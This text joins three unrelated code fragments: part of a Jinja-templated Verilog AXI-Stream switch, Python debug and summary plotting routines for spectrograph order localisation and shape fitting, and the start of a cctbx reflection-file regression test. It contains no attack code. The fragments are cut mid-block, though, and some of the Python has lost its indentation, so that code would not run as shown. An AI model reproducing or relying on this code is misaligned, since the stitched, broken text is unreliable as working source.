output wire output_{{p}}_axis_tuser{% if not loop.last %},{% endif %}
{% endfor -%}
);
// check configuration
initial begin
if (2**DEST_WIDTH < {{n}}) begin
$error("Error: DEST_WIDTH too small for port count");
$finish;
end
if ({%- for p in range(n) %}(OUT_{{p}}_BASE & 2**DEST_WIDTH-1) != OUT_{{p}}_BASE || (OUT_{{p}}_TOP & 2**DEST_WIDTH-1) != OUT_{{p}}_TOP{% if not loop.last %} ||
{% endif %}{% endfor -%}) begin
$error("Error: value out of range");
$finish;
end
if ({%- for p in range(n) %}OUT_{{p}}_BASE > OUT_{{p}}_TOP{% if not loop.last %} ||
{% endif %}{% endfor -%}) begin
$error("Error: invalid range");
$finish;
end
if ({%- for p in range(n-1) %}{% set outer_loop = loop %}{%- for q in range(p+1,n) %}(OUT_{{p}}_BASE <= OUT_{{q}}_TOP && OUT_{{q}}_BASE <= OUT_{{p}}_TOP){% if not (loop.last and outer_loop.last) %} ||
{% endif %}{% endfor -%}{% endfor -%}) begin
$error("Error: ranges overlap");
$finish;
end
end
{%- for p in range(m) %}
reg [{{n-1}}:0] input_{{p}}_request_reg = {{n}}'d0, input_{{p}}_request_next;
reg input_{{p}}_request_valid_reg = 1'b0, input_{{p}}_request_valid_next;
reg input_{{p}}_request_error_reg = 1'b0, input_{{p}}_request_error_next;
{%- endfor %}
{% for p in range(n) %}
reg [{{cm-1}}:0] select_{{p}}_reg = {{cm}}'d0, select_{{p}}_next;
{%- endfor %}
{% for p in range(n) %}
reg enable_{{p}}_reg = 1'b0, enable_{{p}}_next;
{%- endfor %}
{% for p in range(m) %}
reg input_{{p}}_axis_tready_reg = 1'b0, input_{{p}}_axis_tready_next;
{%- endfor %}
// internal datapath
{%- for p in range(n) %}
reg [DATA_WIDTH-1:0] output_{{p}}_axis_tdata_int;
reg [KEEP_WIDTH-1:0] output_{{p}}_axis_tkeep_int;
reg output_{{p}}_axis_tvalid_int;
reg output_{{p}}_axis_tready_int_reg = 1'b0;
reg output_{{p}}_axis_tlast_int;
reg [DEST_WIDTH-1:0] output_{{p}}_axis_tdest_int;
reg output_{{p}}_axis_tuser_int;
wire output_{{p}}_axis_tready_int_early;
{% endfor %}
{%- for p in range(m) %}
assign input_{{p}}_axis_tready = input_{{p}}_axis_tready_reg;
{%- endfor %}
// mux for incoming packet
{% for p in range(n) %}
reg [DATA_WIDTH-1:0] current_input_{{p}}_axis_tdata;
reg [KEEP_WIDTH-1:0] current_input_{{p}}_axis_tkeep;
reg current_input_{{p}}_axis_tvalid;
reg current_input_{{p}}_axis_tready;
reg current_input_{{p}}_axis_tlast;
reg [DEST_WIDTH-1:0] current_input_{{p}}_axis_tdest;
reg current_input_{{p}}_axis_tuser;
always @* begin
case (select_{{p}}_reg)
{%- for q in range(m) %}
{{cm}}'d{{q}}: begin
current_input_{{p}}_axis_tdata = input_{{q}}_axis_tdata;
current_input_{{p}}_axis_tkeep = input_{{q}}_axis_tkeep;
current_input_{{p}}_axis_tvalid = input_{{q}}_axis_tvalid;
current_input_{{p}}_axis_tready = input_{{q}}_axis_tready;
current_input_{{p}}_axis_tlast = input_{{q}}_axis_tlast;
current_input_{{p}}_axis_tdest = input_{{q}}_axis_tdest;
current_input_{{p}}_axis_tuser = input_{{q}}_axis_tuser;
end
{%- endfor %}
default: begin
current_input_{{p}}_axis_tdata = {DATA_WIDTH{1'b0}};
current_input_{{p}}_axis_tkeep = {KEEP_WIDTH{1'b0}};
current_input_{{p}}_axis_tvalid = 1'b0;
current_input_{{p}}_axis_tready = 1'b0;
current_input_{{p}}_axis_tlast = 1'b0;
current_input_{{p}}_axis_tdest = {DEST_WIDTH{1'b0}};
current_input_{{p}}_axis_tuser = 1'b0;
end
endcase
end
{% endfor %}
// arbiter instances
{% for p in range(n) %}
wire [{{m-1}}:0] request_{{p}};
wire [{{m-1}}:0] acknowledge_{{p}};
wire [{{m-1}}:0] grant_{{p}};
wire grant_valid_{{p}};
wire [{{cm-1}}:0] grant_encoded_{{p}};
{% endfor %}
{%- for p in range(n) %}
arbiter #(
.PORTS({{m}}),
.TYPE(ARB_TYPE),
.BLOCK("ACKNOWLEDGE"),
.LSB_PRIORITY(LSB_PRIORITY)
)
arb_{{p}}_inst (
.clk(clk),
.rst(rst),
.request(request_{{p}}),
.acknowledge(acknowledge_{{p}}),
.grant(grant_{{p}}),
.grant_valid(grant_valid_{{p}}),
.grant_encoded(grant_encoded_{{p}})
);
{% endfor %}
// request generation
{%- for p in range(n) %}
{%- for q in range(m) %}
assign request_{{p}}[{{q}}] = input_{{q}}_request_reg[{{p}}] & ~acknowledge_{{p}}[{{q}}];
{%- endfor %}
{% endfor %}
// acknowledge generation
{%- for p in range(n) %}
{%- for q in range(m) %}
assign acknowledge_{{p}}[{{q}}] = grant_{{p}}[{{q}}] & input_{{q}}_axis_tvalid & input_{{q}}_axis_tready & input_{{q}}_axis_tlast;
{%- endfor %}
{% endfor %}
always @* begin
{%- for p in range(n) %}
select_{{p}}_next = select_{{p}}_reg;
{%- endfor %}
{% for p in range(n) %}
enable_{{p}}_next = enable_{{p}}_reg;
{%- endfor %}
{% for p in range(m) %}
input_{{p}}_request_next = input_{{p}}_request_reg;
input_{{p}}_request_valid_next = input_{{p}}_request_valid_reg;
input_{{p}}_request_error_next = input_{{p}}_request_error_reg;
{% endfor %}
{%- for p in range(m) %}
input_{{p}}_axis_tready_next = 1'b0;
{%- endfor %}
{% for p in range(n) %}
output_{{p}}_axis_tdata_int = {DATA_WIDTH{1'b0}};
output_{{p}}_axis_tkeep_int = {DATA_WIDTH{1'b0}};
output_{{p}}_axis_tvalid_int = 1'b0;
output_{{p}}_axis_tlast_int = 1'b0;
output_{{p}}_axis_tdest_int = {DEST_WIDTH{1'b0}};
output_{{p}}_axis_tuser_int = 1'b0;
{% endfor %}
// input decoding
{% for p in range(m) %}
if (input_{{p}}_request_valid_reg | input_{{p}}_request_error_reg) begin
if (input_{{p}}_axis_tvalid & input_{{p}}_axis_tready & input_{{p}}_axis_tlast) begin
input_{{p}}_request_next = {DEST_WIDTH{1'b0}};
input_{{p}}_request_valid_next = 1'b0;
input_{{p}}_request_error_next = 1'b0;
end
end else if (input_{{p}}_axis_tvalid) begin
{%- for q in range(n) %}
input_{{p}}_request_next[{{q}}] = (input_{{p}}_axis_tdest >= OUT_{{q}}_BASE) & (input_{{p}}_axis_tdest <= OUT_{{q}}_TOP) & OUT_{{q}}_CONNECT[{{p}}];
{%- endfor %}
if (input_{{p}}_request_next) begin
input_{{p}}_request_valid_next = 1'b1;
end else begin
input_{{p}}_request_error_next = 1'b1;
end
end
{% endfor %}
// output control
{% for p in range(n) %}
if (current_input_{{p}}_axis_tvalid & current_input_{{p}}_axis_tready) begin
if (current_input_{{p}}_axis_tlast) begin
enable_{{p}}_next = 1'b0;
end
end
if (~enable_{{p}}_reg & grant_valid_{{p}}) begin
enable_{{p}}_next = 1'b1;
select_{{p}}_next = grant_encoded_{{p}};
end
{% endfor %}
// generate ready signal on selected port
{% for p in range(n) %}
if (enable_{{p}}_next) begin
case (select_{{p}}_next)
{%- for q in range(m) %}
{{cm}}'d{{q}}: input_{{q}}_axis_tready_next = output_{{p}}_axis_tready_int_early;
{%- endfor %}
endcase
end
{% endfor %}
{%- for p in range(m) %}
if (input_{{p}}_request_error_next)
input_{{p}}_axis_tready_next = 1'b1;
{%- endfor %}
// pass through selected packet data
{% for p in range(n) %}
output_{{p}}_axis_tdata_int = current_input_{{p}}_axis_tdata;
output_{{p}}_axis_tkeep_int = current_input_{{p}}_axis_tkeep;
output_{{p}}_axis_tvalid_int = current_input_{{p}}_axis_tvalid & current_input_{{p}}_axis_tready & enable_{{p}}_reg;
output_{{p}}_axis_tlast_int = current_input_{{p}}_axis_tlast;
output_{{p}}_axis_tdest_int = current_input_{{p}}_axis_tdest;
output_{{p}}_axis_tuser_int = current_input_{{p}}_axis_tuser;
{% endfor -%}
end
always @(posedge clk) begin
if (rst) begin
{%- for p in range(m) %}
input_{{p}}_request_reg <= {{n}}'d0;
input_{{p}}_request_valid_reg <= 1'b0;
input_{{p}}_request_error_reg <= 1'b0;
{%- endfor %}
{%- for p in range(n) %}
select_{{p}}_reg <= 2'd0;
{%- endfor %}
{%- for p in range(n) %}
enable_{{p}}_reg <= 1'b0;
{%- endfor %}
{%- for p in range(m) %}
input_{{p}}_axis_tready_reg <= 1'b0;
{%- endfor %}
end else begin
{%- for p in range(m) %}
input_{{p}}_request_reg <= input_{{p}}_request_next;
input_{{p}}_request_valid_reg <= input_{{p}}_request_valid_next;
input_{{p}}_request_error_reg <= input_{{p}}_request_error_next;
{%- endfor %}
{%- for p in range(n) %}
select_{{p}}_reg <= select_{{p}}_next;
{%- endfor %}
{%- for p in range(n) %}
enable_{{p}}_reg <= enable_{{p}}_next;
{%- endfor %}
{%- for p in range(m) %}
input_{{p}}_axis_tready_reg <= input_{{p}}_axis_tready_next;
{%- endfor %}
end
end
{% for p in range(n) %}
// output {{p}} datapath logic
reg [DATA_WIDTH-1:0] output_{{p}}_axis_tdata_reg = {DATA_WIDTH{1'b0}};
reg [KEEP_WIDTH-1:0] output_{{p}}_axis_tkeep_reg = {KEEP_WIDTH{1'b0}};
reg output_{{p}}_axis_tvalid_reg = 1'b0, output_{{p}}_axis_tvalid_next;
reg output_{{p}}_axis_tlast_reg = 1'b0;
reg [DEST_WIDTH-1:0] output_{{p}}_axis_tdest_reg = {DEST_WIDTH{1'b0}};
reg output_{{p}}_axis_tuser_reg = 1'b0;
reg [DATA_WIDTH-1:0] temp_{{p}}_axis_tdata_reg = {DATA_WIDTH{1'b0}};
reg [KEEP_WIDTH-1:0] temp_{{p}}_axis_tkeep_reg = {KEEP_WIDTH{1'b0}};
reg temp_{{p}}_axis_tvalid_reg = 1'b0, temp_{{p}}_axis_tvalid_next;
reg temp_{{p}}_axis_tlast_reg = 1'b0;
reg [DEST_WIDTH-1:0] temp_{{p}}_axis_tdest_reg = {DEST_WIDTH{1'b0}};
reg temp_{{p}}_axis_tuser_reg = 1'b0;
// datapath control
reg store_{{p}}_axis_int_to_output;
reg store_{{p}}_axis_int_to_temp;
reg store_{{p}}_axis_temp_to_output;
assign output_{{p}}_axis_tdata = output_{{p}}_axis_tdata_reg;
assign output_{{p}}_axis_tkeep = output_{{p}}_axis_tkeep_reg;
assign output_{{p}}_axis_tvalid = output_{{p}}_axis_tvalid_reg;
assign output_{{p}}_axis_tlast = output_{{p}}_axis_tlast_reg;
assign output_{{p}}_axis_tdest = output_{{p}}_axis_tdest_reg;
assign output_{{p}}_axis_tuser = output_{{p}}_axis_tuser_reg;
// enable ready input next cycle if output is ready or the temp reg will not be filled on the next cycle (output reg empty or no input)
assign output_{{p}}_axis_tready_int_early = output_{{p}}_axis_tready | (~temp_{{p}}_axis_tvalid_reg & (~output_{{p}}_axis_tvalid_reg | ~output_{{p}}_axis_tvalid_int));
always @* begin
// transfer sink ready | |
# get limits for zooms
xmin, xmax = xzoom1[row], xzoom2[row]
ymin, ymax = yzoom1[row], yzoom2[row]
# get image zoom
image_zoom = image[ymin:ymax, xmin:xmax]
# threshold = percentile
threshold = np.nanpercentile(image_zoom, 95)
# ------------------------------------------------------------------
# plot image
im = frame.imshow(image_zoom, origin='lower', vmin=0.0, vmax=threshold,
cmap='gist_gray', aspect='auto',
extent=[xmin, xmax, ymin, ymax])
# loop around xarr and yarr and plot
for order_num in range(len(xarr)):
# x and y
x, y = xarr[order_num], yarr[order_num]
# get ypix
ypix = np.polyval(coeffs[order_num][::-1], xpix)
# plot full fit
frame.plot(xpix, ypix, linewidth=1, color='blue', ls='--', zorder=1)
# plot valid fit
frame.plot(x, y, linewidth=1, color='red', zorder=2)
# set the limits
frame.set(xlim=(xmin, xmax), ylim=(ymin, ymax))
# create an axes on the right side of ax. The width of cax will be 5%
# of ax and the padding between cax and ax will be fixed at 0.05 inch.
divider = axes_grid1.make_axes_locatable(frame)
cax = divider.append_axes("top", size="5%", pad=0.05)
cb = plt.colorbar(im, cax=cax, orientation='horizontal')
cb.ax.xaxis.set_ticks_position('top')
# adjust plot
plt.subplots_adjust(top=0.95, bottom=0.05, left=0.075, right=0.925)
# ------------------------------------------------------------------
# wrap up using plotter
plotter.plotend(graph)
def plot_loc_check_coeffs(plotter, graph, kwargs):
    """Debug plot: residuals between the new and original localisation
    coefficient fits, one figure per order.

    :param plotter: Plotter instance (supplies plt, the plot loop and
                    file naming machinery)
    :param graph: Graph instance being plotted
    :param kwargs: dict of plot arguments, expects:
        - good: 2D bool array [order, x] of valid fit positions
        - xpix: 1D array of x pixel positions
        - ypix: 2D array [order, x] of new y fit positions
        - ypix0: 2D array [order, x] of original y fit positions
        - image: 2D image the fits were measured on
        - order: optional int, a single order to plot (None = loop all)
        - kind: optional str, 'center' adds an image+fits panel

    :return: None - plots via plotter
    """
    # ------------------------------------------------------------------
    # start the plotting process
    if not plotter.plotstart(graph):
        return
    plt = plotter.plt
    # ------------------------------------------------------------------
    # get the arguments from kwargs
    good_arr = kwargs['good']
    xpix = kwargs['xpix']
    ypix = kwargs['ypix']
    ypix0 = kwargs['ypix0']
    image = kwargs['image']
    order = kwargs.get('order', None)
    kind = kwargs.get('kind', None)
    # ------------------------------------------------------------------
    # get order generator
    # ------------------------------------------------------------------
    if order is None:
        order_gen = plotter.plotloop(np.arange(len(good_arr)))
        # prompt to start looper
        plotter.close_plots(loop=True)
    # else we just deal with the order specified
    else:
        order_gen = [order]
    # ------------------------------------------------------------------
    # loop around orders
    for order_num in order_gen:
        # get this iterations values
        good = good_arr[order_num]
        ypixgo = ypix[order_num, good]
        ypix0go = ypix0[order_num, good]
        residual = ypixgo - ypix0go
        # get the y limits (pad by 25% of the span, clipped to the image)
        ymax = np.ceil(np.nanmax([np.nanmax(ypixgo), np.nanmax(ypix0go)]))
        ymin = np.floor(np.nanmin([np.nanmin(ypixgo), np.nanmin(ypix0go)]))
        ydiff = np.ceil(ymax - ymin)
        ymax = np.min([int(ymax + 0.25 * ydiff), image.shape[0]])
        ymin = np.max([int(ymin - 0.25 * ydiff), 0])
        # mask the image between y limits
        imagezoom = image[ymin:ymax]
        # normalise zoom image
        imagezoom = imagezoom / np.nanpercentile(imagezoom, 85)
        # ------------------------------------------------------------------
        # set up plot
        if kind == 'center':
            fig, frames = graph.set_figure(plotter, nrows=2, ncols=1,
                                           sharex=True)
            frame1, frame2 = frames
        else:
            fig, frame2 = graph.set_figure(plotter, nrows=1, ncols=1)
            frame1 = None
        # ------------------------------------------------------------------
        # plot the image fits (if we are dealing with a center plot)
        if kind == 'center':
            frame1.imshow(imagezoom, aspect='auto', origin='lower', zorder=0,
                          cmap='gist_gray', vmin=0, vmax=1,
                          extent=[0, image.shape[1], ymin, ymax])
            frame1.plot(xpix[good], ypix0go, color='b', ls='--', label='old',
                        zorder=2)
            frame1.plot(xpix[good], ypixgo, color='r', ls='-', label='new',
                        zorder=1)
            frame1.legend(loc=0)
            # force x limits
            frame1.set_xlim(0, image.shape[1])
        # ------------------------------------------------------------------
        # plot the residuals - label the line so the legend below has a
        # handle (previously the legend call drew nothing and triggered a
        # matplotlib "no handles with labels" warning)
        frame2.plot(xpix[good], residual, marker='x', label='new - old')
        # add legend
        frame2.legend(loc=0)
        # force x limits
        frame2.set_xlim(0, image.shape[1])
        # ------------------------------------------------------------------
        # construct frame title
        if kind is None:
            title = 'Coefficient Residuals (New - Original) Order={1}'
        else:
            title = '{0} coefficient residuals (New - Original) Order={1}'
        # ------------------------------------------------------------------
        # set title and labels
        if kind == 'center':
            frame1.set(title=title.format(kind, order_num),
                       ylabel='y pixel position')
            frame2.set(xlabel='x pixel position',
                       ylabel=r'$\Delta$y pixel position')
        else:
            frame2.set(title=title.format(kind, order_num),
                       xlabel='x pixel position',
                       ylabel=r'$\Delta$y pixel position')
        # ------------------------------------------------------------------
        # adjust plot
        plt.subplots_adjust(top=0.925, bottom=0.125, left=0.1, right=0.975,
                            hspace=0.05)
        # ------------------------------------------------------------------
        # update filename (adding order_num to end)
        suffix = 'order{0}'.format(order_num)
        graph.set_filename(plotter.params, plotter.location, suffix=suffix)
    # ------------------------------------------------------------------
    # wrap up using plotter
    plotter.plotend(graph)
# define graphing instances
# debug graphs: plotted on demand while the localisation recipe runs
loc_minmax_cents = Graph('LOC_MINMAX_CENTS', kind='debug',
                         func=plot_loc_minmax_cents)
loc_min_cents_thres = Graph('LOC_MIN_CENTS_THRES', kind='debug',
                            func=plot_loc_min_cents_thres)
loc_finding_orders = Graph('LOC_FINDING_ORDERS', kind='debug',
                           func=plot_loc_finding_orders)
loc_im_sat_thres = Graph('LOC_IM_SAT_THRES', kind='debug',
                         func=plot_loc_im_sat_thres)
loc_fit_residuals = Graph('LOC_FIT_RESIDUALS', kind='debug',
                          func=plot_loc_fit_residuals)
loc_ord_vs_rms = Graph('LOC_ORD_VS_RMS', kind='debug',
                       func=plot_loc_ord_vs_rms)
loc_check_coeffs = Graph('LOC_CHECK_COEFFS', kind='debug',
                         func=plot_loc_check_coeffs)
# summary graphs: written to disk for the recipe summary document,
# hence the explicit figure size / dpi / description
sum_desc = ('Polynomial fits for localisation (overplotted on '
            'pre-processed image)')
sum_loc_im_sat_thres = Graph('SUM_LOC_IM_THRES', kind='summary',
                             func=plot_loc_im_sat_thres, figsize=(12, 8),
                             dpi=300, description=sum_desc)
# note: sum_desc is deliberately re-bound here; each Graph captures the
# string passed at construction time
sum_desc = ('Zoom in polynomial fits for localisation (overplotted on '
            'pre-processed image)')
sum_plot_loc_im_corner = Graph('SUM_LOC_IM_CORNER', kind='summary',
                               func=plot_loc_im_corner, figsize=(16, 10),
                               dpi=150, description=sum_desc)
# add to definitions (the module-level registry of available graphs)
definitions += [loc_minmax_cents, loc_min_cents_thres, loc_finding_orders,
                loc_im_sat_thres, loc_ord_vs_rms, loc_check_coeffs,
                loc_fit_residuals,
                sum_loc_im_sat_thres, sum_plot_loc_im_corner]
# =============================================================================
# Define shape plotting functions
# =============================================================================
def plot_shape_dx(plotter, graph, kwargs):
    """Debug plot: the shape-transform dx map, the dx2 map and their
    difference, side by side with shared colour scaling.

    :param plotter: Plotter instance (supplies plt and axes_grid1)
    :param graph: Graph instance being plotted
    :param kwargs: dict of plot arguments, expects:
        - dx: 2D array, first dx map [order, width]
        - dx2: 2D array, second dx map [order, width]
        - bnum: int, current banana iteration number (0-based)
        - nbanana: int, total number of banana iterations

    :return: None - plots via plotter
    """
    # ------------------------------------------------------------------
    # start the plotting process
    if not plotter.plotstart(graph):
        return
    plt = plotter.plt
    axes_grid1 = plotter.axes_grid1
    # ------------------------------------------------------------------
    # get the arguments from kwargs
    dx = kwargs['dx']
    dx2 = kwargs['dx2']
    bnum = kwargs['bnum']
    nbanana = kwargs['nbanana']
    # set the zeropoint
    zeropoint = np.nanmedian(dx)
    # get the sig of dx (median absolute deviation about the zeropoint);
    # used to scale all three colour maps
    sig_dx = np.nanmedian(np.abs(dx - zeropoint))
    # ------------------------------------------------------------------
    # set up plot
    fig, frames = graph.set_figure(plotter, ncols=3, nrows=1)
    # set up axis
    frame1, frame2, frame3 = frames

    def _plot_map(frame, data, nsig, label):
        # plot one map with a horizontal colour bar on top; colour range
        # is zeropoint +/- nsig * sig_dx
        vmin = (-nsig * sig_dx) + zeropoint
        vmax = (nsig * sig_dx) + zeropoint
        im = frame.imshow(data, vmin=vmin, vmax=vmax, cmap='viridis')
        # add colour bar
        divider = axes_grid1.make_axes_locatable(frame)
        cax = divider.append_axes("top", size="10%", pad=0.05)
        cb = plt.colorbar(im, cax=cax, orientation='horizontal')
        # set colorbar tick positions and label
        cb.ax.xaxis.set_ticks_position('top')
        cb.ax.xaxis.set_label_position('top')
        cb.set_label(label)
        # set labels and title
        frame.set(xlabel='width [pix]', ylabel='order number', title=label)

    # ----------------------------------------------------------------------
    # plot dx, dx2 and their difference (the difference uses a tighter
    # colour range so residual structure stands out)
    _plot_map(frame1, dx, 2, 'dx')
    _plot_map(frame2, dx2, 2, 'dx2')
    _plot_map(frame3, dx - dx2, 0.5, 'dx - dx2')
    # ----------------------------------------------------------------------
    # title
    # ----------------------------------------------------------------------
    plt.suptitle('Iteration {0} / {1}'.format(bnum + 1, nbanana))
    # ------------------------------------------------------------------
    # wrap up using plotter
    plotter.plotend(graph)
def plot_shape_linear_tparams(plotter, graph, kwargs):
    """Plot the linear transform parameters as four 2D histograms.

    The four panels show the position residuals (x1 - x2 and y1 - y2) as a
    function of x1 and of y1. On top of each 2D histogram the median residual
    is over-plotted (white points) in windows of +/- nbins pixels every pstep
    pixels, wherever a window contains more than 100 points.

    :param plotter: core plotter instance (provides plotstart/plotend and plt)
    :param graph: Graph instance describing the figure to produce
    :param kwargs: dict with keys:
        image -- 2D array, used only for its shape (dim1 = y-size, dim2 = x-size)
        x1, x2, y1, y2 -- 1D arrays of matched positions before/after transform

    :return: None - all output goes through the plotter
    """
    # ------------------------------------------------------------------
    # start the plotting process (may veto plotting entirely)
    if not plotter.plotstart(graph):
        return
    plt = plotter.plt
    # ------------------------------------------------------------------
    # get the arguments from kwargs
    image = kwargs['image']
    x1 = kwargs['x1']
    x2 = kwargs['x2']
    y1 = kwargs['y1']
    y2 = kwargs['y2']
    # ------------------------------------------------------------------
    # get image shape
    dim1, dim2 = image.shape
    # get calculated parameters
    diffx = x1 - x2
    diffy = y1 - y2
    xrange1 = [0, dim2]
    xrange2 = [0, dim1]
    # y-axis range scaled from the median absolute residuals
    ylim = np.max([np.nanmedian(np.abs(diffx)), np.nanmedian(np.abs(diffy))])
    yrange = [-10 * ylim, 10 * ylim]
    nbins = 50
    pstep = 100
    # ------------------------------------------------------------------
    # set up plot
    fig, frames = graph.set_figure(plotter, ncols=2, nrows=2)
    # set up mean points plot
    mkwargs = dict(color='w', linestyle='None', marker='.')

    def _plot_window_medians(frame, positions, diffs, maxpos):
        # overlay the median of `diffs` in +/- nbins windows placed every
        # pstep pixels along `positions`, where enough points exist
        for pbin in range(0, maxpos, pstep):
            with warnings.catch_warnings(record=True) as _:
                # BUGFIX: was np.abs(positions - pbin < nbins), which took
                # the absolute value of a boolean mask instead of selecting
                # a +/- nbins window around pbin
                keep = np.abs(positions - pbin) < nbins
                nanmed = mp.nanmedian(diffs[keep])
                if np.sum(keep) > 100:
                    frame.plot([pbin], nanmed, **mkwargs)

    # ----------------------------------------------------------------------
    # plot[0,0] x1 vs x1 - x2
    # ----------------------------------------------------------------------
    frames[0, 0].hist2d(x1, diffx, bins=nbins, range=[xrange1, yrange])
    frames[0, 0].set(xlabel='x1', ylabel='x1 - x2')
    _plot_window_medians(frames[0, 0], x1, diffx, dim2)
    # ----------------------------------------------------------------------
    # plot[0,1] y1 vs x1 - x2
    # ----------------------------------------------------------------------
    frames[0, 1].hist2d(y1, diffx, bins=nbins, range=[xrange2, yrange])
    frames[0, 1].set(xlabel='y1', ylabel='x1 - x2')
    # BUGFIX: the medians for this panel were plotted onto frames[0, 0] and
    # binned over dim2; y1 spans dim1 and belongs on this panel
    _plot_window_medians(frames[0, 1], y1, diffx, dim1)
    # ----------------------------------------------------------------------
    # plot[1,0] x1 vs y1 - y2
    # ----------------------------------------------------------------------
    frames[1, 0].hist2d(x1, diffy, bins=nbins, range=[xrange1, yrange])
    frames[1, 0].set(xlabel='x1', ylabel='y1 - y2')
    # BUGFIX: medians were plotted onto frames[0, 0] instead of this panel
    _plot_window_medians(frames[1, 0], x1, diffy, dim2)
    # ----------------------------------------------------------------------
    # plot[1,1] y1 vs y1 - y2
    # ----------------------------------------------------------------------
    frames[1, 1].hist2d(y1, diffy, bins=nbins, range=[xrange2, yrange])
    frames[1, 1].set(xlabel='y1', ylabel='y1 - y2')
    # BUGFIX: medians were plotted onto frames[0, 0] and binned over dim2
    _plot_window_medians(frames[1, 1], y1, diffy, dim1)
    # ----------------------------------------------------------------------
    # title
    # ----------------------------------------------------------------------
    plt.suptitle('Linear transform parameters')
    # ------------------------------------------------------------------
    # wrap up using plotter
    plotter.plotend(graph)
def plot_shape_angle_offset(plotter, graph, kwargs):
# ------------------------------------------------------------------
# start the plotting process
if not plotter.plotstart(graph):
return
# get plt
plt = plotter.plt
# ------------------------------------------------------------------
# get the arguments from kwargs
params = kwargs['params']
| |
<reponame>dperl-sol/cctbx_project<filename>iotbx/regression/tst_reflection_file_utils.py
from __future__ import absolute_import, division, print_function
import libtbx.load_env
from six.moves import range
if (libtbx.env.has_module("ccp4io")):
from iotbx import reflection_file_reader
from iotbx.reflection_file_utils import reflection_file_server, \
guess_r_free_flag_value
from iotbx import mtz
else:
mtz = None
from cctbx import miller
from cctbx import crystal
from cctbx.array_family import flex
from libtbx.test_utils import Exception_expected, show_diff
from libtbx.utils import Sorry, null_out
from six.moves import cStringIO as StringIO
import os
def exercise_get_amplitudes_and_get_phases_deg():
  """Exercise reflection_file_server.get_amplitudes() and get_phases_deg().

  Covers: unambiguous retrieval of a single amplitude array, the
  ambiguous-label and no-match Sorry error paths (checking the exact text
  written to the server's err stream), lookup by file name (relative and
  absolute), on-the-fly conversion of complex and intensity arrays to
  amplitudes, and phase extraction including Hendrickson-Lattman
  coefficient conversion and degree/radian handling.

  Writes tmp_rfu1.mtz, tmp_rfu2.mtz and tmp_rfu3.mtz in the working
  directory as fixtures.
  """
  # build a P1 miller set and two random amplitude arrays as input data
  crystal_symmetry = crystal.symmetry(
    unit_cell=(10,11,12,85,95,100),
    space_group_symbol="P 1")
  miller_set = miller.build_set(
    crystal_symmetry=crystal_symmetry,
    anomalous_flag=False,
    d_min=3)
  input_arrays = [miller_set.array(
    data=flex.random_double(size=miller_set.indices().size()))
    .set_observation_type_xray_amplitude()
      for i in [0,1]]
  # single-array file: lookup must succeed without labels
  mtz_dataset = input_arrays[0].as_mtz_dataset(column_root_label="F0")
  mtz_dataset.mtz_object().write("tmp_rfu1.mtz")
  reflection_files = [reflection_file_reader.any_reflection_file(
    file_name="tmp_rfu1.mtz")]
  reflection_file_srv = reflection_file_server(
    crystal_symmetry=crystal_symmetry,
    force_symmetry=True,
    reflection_files=reflection_files)
  ampl = reflection_file_srv.get_amplitudes(
    file_name=None,
    labels=None,
    convert_to_amplitudes_if_necessary=True,
    parameter_scope="amplitudes",
    parameter_name="labels")
  assert str(ampl.info()) == "tmp_rfu1.mtz:F0"
  ampl = reflection_file_srv.get_miller_array(labels="F0")
  assert str(ampl.info()) == "tmp_rfu1.mtz:F0"
  # two-array file: lookup without labels is ambiguous and must raise Sorry,
  # writing a helpful message (including parameter_scope) to err
  mtz_dataset.add_miller_array(
    miller_array=input_arrays[1], column_root_label="F1")
  mtz_dataset.mtz_object().write("tmp_rfu2.mtz")
  reflection_files = [reflection_file_reader.any_reflection_file(
    file_name="tmp_rfu2.mtz")]
  err = StringIO()
  reflection_file_srv = reflection_file_server(
    crystal_symmetry=crystal_symmetry,
    force_symmetry=True,
    reflection_files=reflection_files,
    err=err)
  try:
    reflection_file_srv.get_amplitudes(
      file_name=None,
      labels=None,
      convert_to_amplitudes_if_necessary=True,
      parameter_scope="amplitudes",
      parameter_name="labels")
  except Sorry:
    assert not show_diff(err.getvalue(), """\
Multiple equally suitable arrays of amplitudes found.
Possible choices:
  tmp_rfu2.mtz:F0
  tmp_rfu2.mtz:F1
Please use amplitudes.labels
to specify an unambiguous substring of the target label.
""")
    err = reflection_file_srv.err = StringIO()
  else:
    raise Exception_expected
  # an unambiguous label substring resolves the ambiguity
  ampl = reflection_file_srv.get_amplitudes(
    file_name=None,
    labels=["F1"],
    convert_to_amplitudes_if_necessary=True,
    parameter_scope="amplitudes",
    parameter_name="labels")
  assert str(ampl.info()) == "tmp_rfu2.mtz:F1"
  # a non-matching label must raise Sorry; with parameter_scope=None the
  # message refers to the bare parameter_name
  try:
    reflection_file_srv.get_amplitudes(
      file_name=None,
      labels=["F2"],
      convert_to_amplitudes_if_necessary=True,
      parameter_name="labels",
      parameter_scope=None)
  except Sorry:
    assert not show_diff(err.getvalue(), """\
No matching array: labels=F2
Possible choices:
  tmp_rfu2.mtz:F0
  tmp_rfu2.mtz:F1
Please use labels
to specify an unambiguous substring of the target label.
""")
    err = reflection_file_srv.err = StringIO()
  else:
    raise Exception_expected
  # lookup by file name loads the additional file on demand
  assert len(reflection_file_srv.file_name_miller_arrays) == 1
  ampl = reflection_file_srv.get_amplitudes(
    file_name="tmp_rfu1.mtz",
    labels=None,
    convert_to_amplitudes_if_necessary=True,
    parameter_scope="amplitudes",
    parameter_name="labels")
  assert len(reflection_file_srv.file_name_miller_arrays) == 2
  assert str(ampl.info()) == "tmp_rfu1.mtz:F0"
  # absolute path and lower-case label substring must also match
  ampl = reflection_file_srv.get_amplitudes(
    file_name=os.path.abspath("tmp_rfu1.mtz"),
    labels=["f0"],
    convert_to_amplitudes_if_necessary=True,
    parameter_scope="amplitudes",
    parameter_name="labels")
  assert len(reflection_file_srv.file_name_miller_arrays) == 2
  assert str(ampl.info()) == "tmp_rfu1.mtz:F0"
  # with no parameter_scope/name at all, the generic message is used
  try:
    reflection_file_srv.get_amplitudes(
      file_name=None,
      labels=None,
      convert_to_amplitudes_if_necessary=True,
      parameter_scope=None,
      parameter_name=None)
  except Sorry:
    assert not show_diff(err.getvalue(), """\
Multiple equally suitable arrays of amplitudes found.
Possible choices:
  tmp_rfu2.mtz:F0
  tmp_rfu2.mtz:F1
Please specify an unambiguous substring of the target label.
""")
    err = reflection_file_srv.err = StringIO()
  else:
    raise Exception_expected
  #
  # add complex (F2), intensity+sigma (F3) and Hendrickson-Lattman (P)
  # arrays to exercise the conversion paths
  mtz_dataset.add_miller_array(
    miller_array=miller_set.array(
      data=flex.polar(
        flex.random_double(size=miller_set.indices().size()),
        flex.random_double(size=miller_set.indices().size()))),
    column_root_label="F2")
